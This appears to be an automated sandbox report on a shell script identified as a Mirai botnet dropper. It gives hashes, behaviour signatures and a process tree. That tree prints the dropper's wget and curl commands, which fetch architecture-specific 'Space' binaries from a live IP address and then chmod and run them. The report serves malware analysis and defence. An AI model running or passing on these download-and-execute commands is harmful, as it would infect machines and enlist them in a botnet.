Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
153s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
22/12/2024, 12:41
Static task
static1
Behavioral task
behavioral1
Sample
1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
1.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
1.sh
-
Size
2KB
-
MD5
8364b34731a2e12ce67c2cfcb2811e75
-
SHA1
5d718457dfa0ecc1a46528696d2769d11adf018f
-
SHA256
cbeb5e39ef97058edd87f838971c4bab379a1a76a3b07b60cd9734efd8154cea
-
SHA512
ca94f2b3643f6047efc405c15eab8fce850602cb28dbf36d760e7b6010df32c202066ab2ef66a79e0437792d8b5babc6f7a5742f7cb26df6e6354b55e1c837f9
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 6 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1491 chmod 1497 chmod 1514 chmod 1524 chmod 1534 chmod 1544 chmod -
Executes dropped EXE 6 IoCs
ioc pid Process /tmp/Space 1492 Space /tmp/Space 1498 Space /tmp/Space 1515 Space /tmp/Space 1525 Space /tmp/Space 1535 Space /tmp/Space 1545 Space -
Modifies Watchdog functionality 1 TTPs 10 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 10 IoCs
description ioc Process File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space -
resource yara_rule behavioral1/files/fstream-5.dat upx -
description ioc Process File opened for reading /proc/1279/status Space File opened for reading /proc/1164/status Space File opened for reading /proc/709/status Space File opened for reading /proc/8/status Space File opened for reading /proc/30/status Space File opened for reading /proc/154/status Space File opened for reading /proc/664/status Space File opened for reading /proc/1004/status Space File opened for reading /proc/80/status Space File opened for reading /proc/1286/status Space File opened for reading /proc/36/status Space File opened for reading /proc/1337/status Space File opened for reading /proc/159/status Space File opened for reading /proc/1099/status Space File opened for reading /proc/1472/status Space File opened for reading /proc/23/status Space File opened for reading /proc/82/status Space File opened for reading /proc/1258/status Space File opened for reading /proc/451/status Space File opened for reading /proc/517/status Space File opened for reading /proc/29/status Space File opened for reading /proc/1520/status Space File opened for reading /proc/400/status Space File opened for reading /proc/1286/status Space File opened for reading /proc/83/status Space File opened for reading /proc/129/status Space File opened for reading /proc/1167/status Space File opened for reading /proc/84/status Space File opened for reading /proc/18/status Space File opened for reading /proc/1326/status Space File opened for reading /proc/468/status Space File opened for reading /proc/960/status Space File opened for reading /proc/1279/status Space File opened for reading /proc/1089/status Space File opened for reading /proc/8/status Space File opened for reading /proc/1108/status Space File opened for reading /proc/517/status Space File opened for reading /proc/1472/status Space File opened for reading /proc/20/status Space File opened for reading /proc/21/status Space File opened for reading /proc/701/status Space File opened for reading /proc/158/status Space File opened for reading /proc/10/status Space File opened for reading /proc/947/status Space File opened for reading /proc/1312/status Space File opened for reading /proc/949/status Space File opened for reading /proc/20/status Space File opened for reading /proc/1326/status Space File opened for reading /proc/163/status Space File opened for reading /proc/169/status Space File opened for reading /proc/1057/status Space File opened for reading /proc/633/status Space File opened for reading /proc/444/status Space File opened for reading /proc/1062/status Space File opened for reading /proc/1232/status Space File opened for reading /proc/34/status Space File opened for reading /proc/1538/status Space File opened for reading /proc/1278/status Space File opened for reading /proc/431/status Space File opened for reading /proc/36/status Space File opened for reading /proc/1538/status Space File opened for reading /proc/624/status Space File opened for reading /proc/79/status Space File opened for reading /proc/158/status Space -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1531 wget 1532 curl 1541 wget 1542 curl -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Space.x86 curl File opened for modification /tmp/Space.x86_64 wget File opened for modification /tmp/Space.mips curl File opened for modification /tmp/busybox cp File opened for modification /tmp/Space.arc wget File opened for modification /tmp/Space 1.sh File opened for modification /tmp/Space.x86 wget File opened for modification /tmp/Space.mips wget File opened for modification /tmp/Space.mips64 curl File opened for modification /tmp/Space.arc curl File opened for modification /tmp/Space.x86_64 curl File opened for modification /tmp/Space.i686 wget File opened for modification /tmp/Space.i686 curl
Processes
-
/tmp/1.sh/tmp/1.sh1⤵
- Writes file to tmp directory
PID:1475 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Writes file to tmp directory
PID:1476
-
-
/usr/bin/wgetwget http://154.216.20.221/hiddenbin/Space.arc2⤵
- Writes file to tmp directory
PID:1477
-
-
/usr/bin/curlcurl -O http://154.216.20.221/hiddenbin/Space.arc2⤵
- Writes file to tmp directory
PID:1489
-
-
/bin/catcat Space.arc2⤵PID:1490
-
-
/bin/chmodchmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy2⤵
- File and Directory Permissions Modification
PID:1491
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:1492
-
-
/usr/bin/wgetwget http://154.216.20.221/hiddenbin/Space.x862⤵
- Writes file to tmp directory
PID:1494
-
-
/usr/bin/curlcurl -O http://154.216.20.221/hiddenbin/Space.x862⤵
- Writes file to tmp directory
PID:1495
-
-
/bin/catcat Space.x862⤵PID:1496
-
-
/bin/chmodchmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.x86 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy2⤵
- File and Directory Permissions Modification
PID:1497
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1498
-
-
/usr/bin/wgetwget http://154.216.20.221/hiddenbin/Space.x86_642⤵
- Writes file to tmp directory
PID:1511
-
-
/usr/bin/curlcurl -O http://154.216.20.221/hiddenbin/Space.x86_642⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/chmodchmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.x86 Space.x86_64 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy2⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1515
-
-
/usr/bin/wgetwget http://154.216.20.221/hiddenbin/Space.i6862⤵
- Writes file to tmp directory
PID:1521
-
-
/usr/bin/curlcurl -O http://154.216.20.221/hiddenbin/Space.i6862⤵
- Writes file to tmp directory
PID:1522
-
-
/bin/chmodchmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.i686 Space.x86 Space.x86_64 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy2⤵
- File and Directory Permissions Modification
PID:1524
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1525
-
-
/usr/bin/wgetwget http://154.216.20.221/hiddenbin/Space.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1531
-
-
/usr/bin/curlcurl -O http://154.216.20.221/hiddenbin/Space.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1532
-
-
/bin/chmodchmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy2⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1535
-
-
/usr/bin/wgetwget http://154.216.20.221/hiddenbin/Space.mips642⤵
- System Network Configuration Discovery
PID:1541
-
-
/usr/bin/curlcurl -O http://154.216.20.221/hiddenbin/Space.mips642⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1542
-
-
/bin/chmodchmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1545
-
-
/usr/bin/wgetwget http://154.216.20.221/hiddenbin/Space.mpsl2⤵PID:1551
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
37KB
MD5b73e8fbb7aee4bbe5902554d6ab22092
SHA1620097bfd55d8ade8d138bb2ba10e8d4c43fd105
SHA25622dfde185b0b8051baf38817b34383b65d9dbe7ef4f09ad9cd856154c0709d04
SHA512d42eed1c1ac183241f787c967d627e3df379c13c2b992c83c3cd9cdd5ee1446e8898709ad1472ba31a36aab9cbdc04b9c0a7c36668e39c8d26d5b808bb4ea9d8
-
Filesize
113KB
MD50fdd3e751fa9d0f60c5a218e4269c9ad
SHA10d9ae7d06494f59cfc3bfba8e162e29630159be3
SHA25681749b59ba614b200a57dd0990104117748a04add1ce6f28528328fb50e19528
SHA5122b9ab36b3f5fd535ff322c4ac3fcad543b3d6da8fdbad80c6dfad309bf33e340ed9871453f7614d3a35395e7afd23066d7c766fb7b4466ccf591e570300ae0de
-
Filesize
2.0MB
MD5b4dede5fc0b1bad5cb8e901bde126b97
SHA110cbe9a418ad84a1ed297948539d37aeb58dd810
SHA256a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020
SHA51245665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6